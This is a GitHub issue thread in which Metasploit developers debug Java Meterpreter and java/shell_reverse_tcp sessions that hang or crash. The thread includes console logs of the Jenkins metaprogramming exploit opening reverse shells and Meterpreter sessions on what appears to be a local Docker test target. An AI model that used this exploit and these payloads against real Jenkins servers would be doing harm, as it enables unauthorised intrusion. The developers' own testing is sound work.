Metasploit-framework: shell_command_token hangs java/meterpreter/reverse_tcp and crashes java/shell_reverse_tcp

Created on 6 Mar 2019 · 13Comments · Source: rapid7/metasploit-framework

msf5 exploit(multi/http/jenkins_metaprogramming) > run

[*] Started reverse TCP handler on 192.168.1.2:4444
[*] Using URL: http://0.0.0.0:8081/metasploit/exploit/1.0/exploit-1.0.jar
[*] Local IP: http://192.168.1.2:8081/metasploit/exploit/1.0/exploit-1.0.jar
[*] /metasploit/exploit/1.0/exploit-1.0.jar requested
[+] Sending payload JAR
[*] Sending stage (53866 bytes) to 192.168.1.2
[*] Meterpreter session 40 opened (192.168.1.2:4444 -> 192.168.1.2:58403) at 2019-03-06 02:29:44 -0600
[*] Server stopped.

meterpreter > ls
Listing: /
==========

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100555/r-xr-xr-x  0     fil   2019-03-06 01:17:13 -0600  .dockerenv
40554/r-xr-xr--   4096  dir   2018-08-13 03:59:12 -0500  bin
40554/r-xr-xr--   340   dir   2019-03-06 01:17:13 -0600  dev
40554/r-xr-xr--   4096  dir   2019-03-06 01:17:13 -0600  etc
40554/r-xr-xr--   4096  dir   2018-07-05 09:47:40 -0500  home
40554/r-xr-xr--   4096  dir   2018-08-13 03:58:30 -0500  lib
40554/r-xr-xr--   4096  dir   2018-07-05 09:47:40 -0500  media
40554/r-xr-xr--   4096  dir   2018-07-05 09:47:40 -0500  mnt
40554/r-xr-xr--   0     dir   2019-03-06 01:17:13 -0600  proc
40000/---------   4096  dir   2018-07-05 09:47:40 -0500  root
40554/r-xr-xr--   4096  dir   2018-07-05 09:47:40 -0500  run
40554/r-xr-xr--   4096  dir   2018-08-13 03:58:30 -0500  sbin
40554/r-xr-xr--   4096  dir   2018-07-05 09:47:40 -0500  srv
40554/r-xr-xr--   0     dir   2019-03-06 01:17:13 -0600  sys
40776/rwxrwxrw-   4096  dir   2019-03-06 02:29:46 -0600  tmp
40554/r-xr-xr--   4096  dir   2018-07-10 19:34:55 -0500  usr
40554/r-xr-xr--   4096  dir   2018-08-13 03:58:44 -0500  var

meterpreter > pry
[*] Starting Pry shell...
[*] You are in the "client" (session) object

[1] pry(#<Msf::Sessions::Meterpreter_Java_Java>)> shell_command_token('ls')
Rex::TimeoutError: Operation timed out.
from /rapid7/metasploit-framework/lib/rex/post/meterpreter/packet_dispatcher.rb:177:in `send_request'
[2] pry(#<Msf::Sessions::Meterpreter_Java_Java>)>
meterpreter > ls
[-] Error running command ls: Rex::TimeoutError Operation timed out.
meterpreter >

11466

bug library meterpreter

Source

wvu-r7

Most helpful comment

Xyzzy

busterb on 7 Jun 2019

😄2

All 13 comments

Hmm, I wonder why would 'ls' get executed as a shell command in the first place against a meterpreter, since they should have native directory listing support without running a subshell. Maybe that's a feature missing specifically from the Java one.

busterb on 6 Mar 2019

No, that can't be it: metasploit-payloads/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_fs_ls.java

busterb on 6 Mar 2019

ls is just an example. Any command hangs. Specifically, I was trying to use FileDropper and ended up testing with on_new_session and shell_command_token.

wvu-r7 on 6 Mar 2019

It appears that java/shell_reverse_tcp is also affected. Curiously, java/shell/reverse_tcp (staged) works.

msf5 exploit(multi/http/jenkins_metaprogramming) > run

[*] Started reverse TCP handler on 192.168.1.2:4444
[*] Using URL: http://0.0.0.0:8081/metasploit/exploit/1.0/exploit-1.0.jar
[*] Local IP: http://192.168.1.2:8081/metasploit/exploit/1.0/exploit-1.0.jar
[*] /metasploit/exploit/1.0/exploit-1.0.jar requested
[+] Sending payload JAR
[*] Command shell session 71 opened (192.168.1.2:4444 -> 192.168.1.2:65497) at 2019-03-06 12:33:18 -0600
[*] 127.0.0.1 - Command shell session 71 closed.
[*] Server stopped.

[-] Invalid session identifier: 71
msf5 exploit(multi/http/jenkins_metaprogramming) >

msf5 exploit(multi/http/jenkins_metaprogramming) > run

[*] Started reverse TCP handler on 192.168.1.2:4444
[*] Using URL: http://0.0.0.0:8081/metasploit/exploit/1.0/exploit-1.0.jar
[*] Local IP: http://192.168.1.2:8081/metasploit/exploit/1.0/exploit-1.0.jar
[*] /metasploit/exploit/1.0/exploit-1.0.jar requested
[+] Sending payload JAR
[*] Sending stage (2952 bytes) to 192.168.1.2
[*] Command shell session 72 opened (192.168.1.2:4444 -> 192.168.1.2:65505) at 2019-03-06 12:33:52 -0600
removed '/var/jenkins_home/.groovy/grapes/metasploit/exploit/jars/exploit-1.0.jar'
removed directory '/var/jenkins_home/.groovy/grapes/metasploit/exploit/jars'
removed '/var/jenkins_home/.groovy/grapes/metasploit/exploit/ivydata-1.0.properties'
removed '/var/jenkins_home/.groovy/grapes/metasploit/exploit/ivy-1.0.xml'
removed directory '/var/jenkins_home/.groovy/grapes/metasploit/exploit'
removed directory '/var/jenkins_home/.groovy/grapes/metasploit'

[*] Server stopped.

id
uid=1000(jenkins) gid=1000(jenkins) groups=1000(jenkins)
uname -a
Linux 7f1459d523a7 4.9.93-linuxkit-aufs #1 SMP Wed Jun 6 16:55:56 UTC 2018 x86_64 GNU/Linux

wvu-r7 on 6 Mar 2019

@timwr: Do you know anything about this? Regression?

wvu-r7 on 12 Mar 2019

This is exactly the sort of thing I'd break and not realize, let me have a look.

timwr on 13 Mar 2019

❤1

If you could post some notes on how to enable debug output in Java payloads, I'd love to have them.

I tried to add some calls to Utils.log in various places yesterday just to see what was happening, but was unable to get a java payload to log anything. If enabling debug output was something that worked like enabling debug on other Meterpreter payloads (as a datastore option), that would be doubly cool to have as a feature too.

busterb on 13 Mar 2019

👍1

I had a look at this but no fix yet. It seems the call to core_channel_read blocks waiting for data.

timwr on 15 Mar 2019

😕1

Apologies! Still stuck here: https://github.com/rapid7/metasploit-payloads/blob/master/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/Channel.java#L74

timwr on 22 Mar 2019

Looks like this is fixed in metasploit-payloads, let's test it out. @bwatters-r7

busterb on 25 Apr 2019

@busterb Did #11911 fix this issue?